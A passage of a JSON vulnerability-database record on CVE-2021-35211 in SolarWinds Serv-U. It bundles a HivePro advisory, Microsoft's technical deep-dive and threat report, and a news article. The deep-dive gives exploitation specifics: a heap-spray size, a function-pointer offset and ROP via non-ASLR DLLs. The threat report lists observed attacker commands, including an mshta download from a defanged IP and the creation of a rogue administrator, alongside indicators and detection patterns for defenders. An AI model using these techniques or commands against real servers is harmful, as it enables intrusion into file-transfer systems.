"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202125.pdf>).\n\nA zero-day vulnerability (CVE-2021-35211) that impacts the Serv-U Managed File Transfer and Serv-U Secure FTP, is been exploited by multiple threat actors. The PoC of this exploited vulnerability was given to SolarWinds by Microsoft. SolarWinds has released a patch for the same.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/Screenshot-2021-07-13-165414-1024x186.png)\n\n#### Indicator of Compromise\n\n**Type**| **Value** \n---|--- \nIP Address| 98.176.196.89 \n68.235.178.32 \n208.113.35.58 \n \n#### Patch Link\n\n<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>\n\n#### References\n\n<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>\n\n<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T12:50:52", "type": "hivepro", "title": "Threat Actors are actively exploiting a SolarWinds Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:50:52", "id": "HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13", "href": "https://www.hivepro.com/threat-actors-are-actively-exploiting-a-solarwinds-zero-day/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-09-02T16:13:25", "description": "Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the [attack](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures. In this blog, we share technical information about the vulnerability, tracked as [CVE-2021-35211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211>), that we shared with SolarWinds, who promptly released [security updates](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) to fix the vulnerability and mitigate the attacks.\n\nThis analysis was conducted by the Microsoft Offensive Research & Security Engineering team, a focused group tasked with supporting teams like MSTIC with exploit development expertise. Our team\u2019s remit is to make computing safer. We do this by leveraging our knowledge of attacker techniques and processes to build and improve protections in Windows and Azure through reverse engineering, attack creation and replication, vulnerability research, and intelligence sharing.\n\nIn early July, MSTIC provided our team with data that seemed to indicate exploit behavior against a newly-discovered vulnerability in the SolarWinds Serv-U FTP server\u2019s SSH component. Although the intel contained useful indicators, it lacked the exploit in question, so our team set out to reconstruct the exploit, which required to first find and understand the new vulnerability in the Serv-U SSH-related code.\n\nAs we knew this was a remote, pre-auth vulnerability, we quickly constructed a fuzzer focused on the pre-auth portions of the SSH handshake and noticed that the service captured and passed all access violations without terminating the process. It immediately became evident that the Serv-U process would make stealthy, reliable exploitation attempts simple to accomplish. We concluded that the exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context. This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages. Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation.\n\nWe shared these findings, as well as the fuzzer we created, with SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/en-us/msrc/msvr>) (MSVR), and worked with them to fix the issue. This is an example of intelligence sharing and industry collaboration that result in comprehensive protection for the broader community through detection of attacks through products and fixing vulnerabilities through security updates.\n\n### Vulnerability in Serv-U\u2019s implementation of SSH\n\nSecure Shell (SSH) is a widely adopted protocol for secure communications over an untrusted network. The protocol behavior is defined in multiple requests for comment (RFCs), and existing implementations are available in open-source code; we primarily used [RFC 4253](<https://datatracker.ietf.org/doc/html/rfc4253>), [RFC 4252](<https://datatracker.ietf.org/doc/html/rfc4252>), and [libssh](<https://git.libssh.org/projects/libssh.git/tree/>) as references for this analysis.\n\nThe implementation of SSH in Serv-U was found by enumerating references to the \u201cSSH-\u201c string, which must be present in the first data sent to the server. The most likely instance of such code was the following:\n\n![Screenshot of code showing instance of SSH](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig1-Serv-U-SSH-blog.png)\n\n_Figure 1. Promising instance of \u201cSSH-\u201d string_\n\nPutting a breakpoint on the above code and attempting to connect to Serv-U with an SSH client confirmed our hypothesis and resulted in the breakpoint being hit with the following call stack:\n\n![Screenshot of code showing call stack resulting from break point](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig2-Serv-U-SSH-blog.png)\n\n_Figure 2. The call stack resulting from a break point set on code in Figure 1._\n\nAt this point, we noticed that _Serv-U.dll_ and _RhinoNET.dll_ both have ASLR support disabled, making them prime locations for ROP gadgets, as any addresses within them will be constant across any server instances running on the internet for a given Serv-U version.\n\nAfter reversing related code in the _RhinoNET_ and _Serv-U_ DLLs, we could track SSH messages\u2019 paths as Serv-U processes them. To handle an incoming SSH connection, _Serv-U.dll_ creates a _CSUSSHSocket_ object, which is derived from the _RhinoNET!CRhinoSocket class_. The _CSUSSHSocket_ object lifetime is the length of the TCP connection\u2014it persists across possibly many individual TCP packets. The underlying _CRhinoSocket_ provides a buffered interface to the socket such that a single TCP packet may contain any number of bytes. This implies a single packet may include any number of SSH messages (provided they fit in the maximum buffer size), as well as partial SSH messages. The _CSUSSHSocket::ProcessRecvBuffer_ function is then responsible for parsing the SSH messages from the buffered socket data.\n\n_CSUSSHSocket::ProcessRecvBuffer_ begins by checking for the SSH version with _ParseBanner_. If _ParseBanner_ successfully parses the SSH version from the banner, _ProcessRecvBuffer_ then loops over _ParseMessage_, which obtains a pointer to the current message in the socket data and extracts the _msg_id_ and _length_ fields from the message (more on the _ParseMessage_ function later).\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig3-Serv-U-SSH-blog.png)\n\n_Figure 3. Selection of code from CSUSSHSocket::ProcessRecvBuffer processing loop_\n\nThe socket data being iterated over is conceptually an array of the pseudo-C structure _ssh_msg_t_, as seen below. The message data is contained within the payload buffer, the first byte of which is considered the _msg_id_:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig3a-Serv-U-SSH-blog.png)\n\n_ProcessRecvBuffer_ then dispatches handling of the message based on the _msg_id_. Some messages are handled directly from the message parsing loop, while others get passed to _ssh_pkt_others_, which posts the message to a queue for another thread to pick up and process.\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig4-Serv-U-SSH-blog.png)\n\n_Figure 4.Pre-auth reachable handlers in CSUSSHSocket::ProcessRecvBuffer_\n\nIf the _msg_id_ is deferred to the alternate thread, _CSSHSession::OnSSHMessage _processes it. This function mainly deals with messages that need to interact with Serv-U managed user profile data (e.g., authentication against per-user credentials) and UI updates. _CSSHSession::OnSSHMessage_ turned out to be uninteresting in terms of vulnerability hunting as most message handlers within it require successful user authentication (initial telemetry indicated this was a pre-authentication vulnerability), and no vulnerabilities were found in the remaining handlers.\n\nWhen initially running fuzzers against Serv-U with a debugger attached, it was evident that the application was catching exceptions which would normally crash a process (such as access violations), logging the error, modifying state just enough to avoid termination of the process, and then continuing as if there had been no problem. This behavior improves uptime of the file server application but also results in possible memory corruption lingering around in the process and building up over time. As an attacker, this grants opportunities like brute-forcing addresses of code or data with dynamic addresses.\n\nThis squashing of access violations assists with exploitation, but for fuzzing, we filtered out \u201cuninteresting\u201d exceptions generated by read/write access violations and let the fuzzer run until hitting a fault wherein RIP had been corrupted. This quickly resulted in the following crashing context:\n\n![Screenshot of Wndbg](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig5-Serv-U-SSH-blog.png)\n\n_Figure 5. WinDbg showing crashing context from fuzzer-generated SSH messages_\n\nAs seen above, _CRYPTO_ctr128_encrypt_ in _libeay32.dll_ (part of OpenSSL) attempted to call an invalid address. The version of OpenSSL used is 1.0.2u, so we obtained the [sources](<https://www.openssl.org/source/old/1.0.2/openssl-1.0.2u.tar.gz>) to peruse. The following shows the relevant OpenSSL function:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig5a-Serv-U-SSH-blog.png)\n\nMeanwhile, the following shows the structure that is passed:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig5b-Serv-U-SSH-blog.png)\n\nThe crashing function was reached from the OpenSSL API boundary via the following path: _EVP_EncryptUpdate_ -> _evp_EncryptDecryptUpdate_ -> _aes_ctr_cipher_ -> _CRYPTO_ctr128_encrypt_.\n\nLooking further up the call stack, it is evident that Serv-U calls _EVP_EncryptUpdate_ from _CSUSSHSocket::ParseMessage_, as seen below:\n\n![Screenshot of code showing location of SSL](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6-Serv-U-SSH-blog.png)\n\n_Figure 6. Location of call into OpenSSL, wherein attacker-controlled function pointer may be invoked_\n\nAt this point, we manually minimized the TCP packet buffer produced by the fuzzer until only the SSH messages required to trigger the crash remained. In notation like that used in the RFCs, the required SSH messages were:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6a-Serv-U-SSH-blog.png)\n\nNote that the following description references \u201cencrypt\u201d functions being called when the crashing code path is clearly attempting to decrypt a buffer. This is not an error: Serv-U uses the encrypt OpenSSL API and, while not optimal for code clarity, it is behaviorally correct since Advanced Encryption Standard (AES) is operating in counter (CTR) mode.\n\nAfter taking a Time Travel Debugging trace and debugging through the message processing sequence, we found that the root cause of the issue was that Serv-U initially creates the OpenSSL AES128-CTR context with code like the following:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6b-Serv-U-SSH-blog.png)\n\nCalling [_EVP_EncryptInit_ex_](<https://www.openssl.org/docs/man1.0.2/man3/EVP_EncryptInit_ex.html>) with NULL key and/or IV is valid, and Serv-U does so in this case because the context is created while handling the KEXINIT message, which is before key material is ready. However, AES key expansion is not performed until the key is set, and the data in the _ctx->cipher_data_ structure remains uninitialized until the key expansion is performed. We can (correctly) surmise that our sequence of messages to hit the crash has caused _enc_algo_client_to_server->decrypt_ to be called before the key material is initialized. The Serv-U KEXINIT handler creates objects for all parameters given in the message. However, the corresponding objects currently active for the connection are not replaced with the newly created ones until the following NEWKEYS message is processed. The client always completes the key exchange process In a normal SSH connection before issuing a NEWKEYS message. Serv-U processed NEWKEYS (thus setting the _m_bCipherActive_ flag and replacing the cipher objects) no matter the connection state or key exchange. From this, we can see that the last message type in our fuzzed sequence does not matter\u2014there only needs to be some data remaining to be processed in the socket buffer to trigger decryption after the partially initialized AES CTR cipher object has been activated.\n\n### Exploitation\n\nAs the vulnerability allows loading RIP from uninitialized memory and as there are some modules without ASLR in the process, exploitation is not so complicated: we can find a way to control the content of the uninitialized _cipher_data _structure, point the _cipher_data->block_ function pointer at some initial ROP gadget, and start a ROP chain. Because of the exception handler causing any fault to be ignored, we do not necessarily need to attain reliable code execution upon the first packet. It is possible to retry exploitation until code execution is successful, however this will leave traces in log files and as such it may be worthwhile to invest more effort into a different technique which would avoid logging.The first step is to find the size of the _cipher_data_ allocation, as the most direct avenue to prefill the buffer is to spray allocations of the target allocation size and free them before attempting to reclaim the address as _cipher_data. ctx->cipher_data_ is allocated and assigned in EVP_CipherInit_ex with the following line:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6c-Serv-U-SSH-blog.png)\n\nWith a debugger, we can see the _ctx_size_ in our case is _0x108_, and that this allocator winds up calling _ucrtbase!_malloc_base_. From previous reversing, we know that both _CRhinoSocket_ and _CSUSSHSocket_ levels of packet parsing call _operator new[]_ to allocate space to hold the packets we send. Luckily, that also winds up in _ucrtbase!_malloc_base_, using the same heap. Therefore, prefilling the target allocation is as simple as sending a properly sized TCP packet or SSH message and then closing the connection to ensure it is freed. Using this path to spray does not trigger other allocations of the same size, so we don\u2019t have to worry about polluting the heap.\n\nAnother important value to pull out of the debugger/disassembly is _offsetof(EVP_AES_KEY, block)_, as that offset in the sprayed data needs to be set to the initial ROP gadget. This value is _0xf8_. Conveniently, most of the rest of the _EVP_AES_KEY_ structure can be used for the ROP chain contents itself, and a pointer to the base of this structure exists in registers _rbx_, _r8_, and _r10_ at the time of the controlled function pointer call.\n\nAs a simple proof of concept, consider the following python code:\n\n![Screenshot of code](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig6d-Serv-U-SSH-blog.png)\n\nThe above results in the following context in the debugger:\n\n![Screenshot of code showing machine context](https://www.microsoft.com/security/blog/uploads/securityprod/2021/09/Fig7-Serv-U-SSH-blog.png)\n\n_Figure 7. Machine context showing rcx, rdx, and rip controlled by attacker_\n\n### Conclusion: Responsible disclosure and industry collaboration improves security for all\n\nOur research shows that the Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration. An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported.\n\nWe shared our findings to SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD). We also shared the fuzzer we created. SolarWinds released an [advisory and security patch](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), which we strongly encourage customers to apply. If you are not sure if your system is affected, open a support case in the [SolarWinds Customer Portal](<https://customerportal.solarwinds.com/support/submit-a-ticket?sid=satsn>).\n\nIn addition to sharing vulnerability details and fuzzing tooling with SolarWinds, we also recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. Enabling ASLR is a simple compile-time flag which is enabled by default and has been available since Windows Vista. ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U.\n\nWe would like to thank SolarWinds for their prompt response. This case further underscores the need for constant collaboration among software vendors, security researchers, and other players to ensure the safety and security of users\u2019 computing experience.\n\n \n\n**_Microsoft Offensive Research & Security Engineering team_**\n\n \n\nThe post [A deep-dive into the SolarWinds Serv-U SSH vulnerability](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-02T16:00:56", "type": "mmpc", "title": "A deep-dive into the SolarWinds Serv-U SSH vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-02T16:00:56", "id": "MMPC:C6E199EAD7CE978C9F1B558F17746AFD", "href": "https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-27T08:39:32", "description": "Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.\n\nThe vulnerability being exploited is CVE-2021-35211, which was [recently patched by SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>). The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U\u2019s implementation of the Secure Shell (SSH) protocol. If Serv-U\u2019s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker\u2019s follow-on malicious actions. [Microsoft Threat Experts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide>) customers who were affected were notified of attacker activity and were aided in responding to the attack.\n\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.\n\n## Who is DEV-0322?\n\nMSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d or \u201cDEV group\u201d and assigns each DEV group a unique number (DEV-####) for tracking purposes.\n\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.\n\n## Attack details\n\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from _Serv-U.exe_ include:\n\n * _C:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a_ (defanged)\n * _cmd.exe /c whoami > "./Client/Common/redacted.txt"_\n * _cmd.exe /c dir > ".\\Client\\Common\\redacted.txt"_\n * _cmd.exe /c ""C:\\Windows\\Temp\\Serv-U.bat""_\n * _powershell.exe C:\\Windows\\Temp\\Serv-U.bat_\n * _cmd.exe /c type \\\\\\redacted\\redacted.Archive > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\redacted.Archive"_\n\nWe observed DEV-0322 piping the output of their _cmd.exe_ commands to files in the Serv-U _\\Client\\Common\\ _folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new [global user](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted_ .Archive _file in the _Global Users_ directory. Serv-U user information is stored in these _.Archive _files.\n\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, _DebugSocketLog.txt_. The process could also crash after a malicious command was run.\n\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\n\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a [targeted attack notification](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide#microsoft-threat-experts---targeted-attack-notification>), which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.\n\n## Detection guidance\n\nCustomers should review the Serv-U _DebugSocketLog.txt_ log file for exception messages like the line below. A _C0000005; CSUSSHSocket::ProcessReceive_ exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.\n\n`EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5`\n\nAdditional signs of potential compromise include:\n\n * Recent creation of_ .txt_ files in the Client\\Common\\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.\n * _Serv-U.exe_ spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for: \n * _mshta.exe_\n * _powershell.exe_\n * cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line: \n * _whoami_\n * _dir_\n * _./Client/Common_\n * _.\\Client\\Common_\n * _type [a file path] > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\\\[file name].Archive"_\n * Any process with any of the following in the command line: \n * _C:\\Windows\\Temp\\_\n * The addition of any unrecognized [global users](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in _C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users_, which appears to store the Global users information.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/Serv-U-console.png)\n\n### Detection details\n\n#### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Behavior:Win32/ServuSpawnSuspProcess.A\n * Behavior:Win32/ServuSpawnCmdClientCommon.A\n\n#### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\n\n * Suspicious behavior by Serv-U.exe\n\n#### Azure Sentinel query\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/DEV-0322_SolarWinds_Serv-U_IOC.yaml>).\n\n### Indicators of compromise (IOCs)\n\n * 98[.]176[.]196[.]89\n * 68[.]235[.]178[.]32\n * 208[.]113[.]35[.]58\n * 144[.]34[.]179[.]162\n * 97[.]77[.]97[.]58\n * hxxp://144[.]34[.]179[.]162/a\n * C:\\Windows\\Temp\\Serv-U.bat\n * C:\\Windows\\Temp\\test\\current.dmp\n\nThe post [Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T22:30:17", "type": "mmpc", "title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T22:30:17", "id": "MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2", "href": "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:21", "description": "[![Chinese Hackers](https://thehackernews.com/images/-jV4pKLPO7z0/YO5ckCIQNCI/AAAAAAAADLw/TXffCrpewWobX23OGALAYFYzGr4TeTg5gCLcBGAsYHQ/s728-e1000/china-hackers.jpg)](<https://thehackernews.com/images/-jV4pKLPO7z0/YO5ckCIQNCI/AAAAAAAADLw/TXffCrpewWobX23OGALAYFYzGr4TeTg5gCLcBGAsYHQ/s0/china-hackers.jpg>)\n\nMicrosoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed \"DEV-0322.\"\n\nThe revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads or view and alter sensitive data.\n\nTracked as [CVE-2021-35211](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>), the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. While it was previously revealed that the attacks were limited in scope, SolarWinds said it's \"unaware of the identity of the potentially affected customers.\"\n\nAttributing the intrusions with high confidence to DEV-0322 (short for \"Development Group 0322\") based on observed victimology, tactics, and procedures, Microsoft Threat Intelligence Center (MSTIC) said the adversary is known for targeting entities in the U.S. Defense Industrial Base Sector and software companies.\n\n[![SolarWinds 0-Day](https://thehackernews.com/images/-55EFUGOJ584/YO5Y4JTqstI/AAAAAAAADLo/AkprVUi-G1ETMw4yhMrl4J5x66wUvYMcQCLcBGAsYHQ/s728-e1000/windows-malware.jpg)](<https://thehackernews.com/images/-55EFUGOJ584/YO5Y4JTqstI/AAAAAAAADLo/AkprVUi-G1ETMw4yhMrl4J5x66wUvYMcQCLcBGAsYHQ/s0/windows-malware.jpg>)\n\n\"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,\" [according](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) to MSTIC, which discovered the zero-day after it detected as many as six anomalous malicious processes being spawned from the main Serv-U process, suggesting a compromise.\n\nThe development also marks the second time a China-based hacking group has exploited vulnerabilities in SolarWinds software as a fertile field for targeted attacks against corporate networks.\n\nBack in December 2020, Microsoft disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. The intrusions have since been attributed to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\nAdditional indicators of compromise associated with the attack can be accessed from SolarWinds' revised advisory [here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n**Update:** This article has been updated to reflect that attackers didn't exploit the SolarWinds flaw to target defense and software companies. As of now, no information has been provided on who was attacked during this zero-day attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T03:41:00", "type": "thn", "title": "Chinese Hackers Exploited Latest SolarWinds 0-Day in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 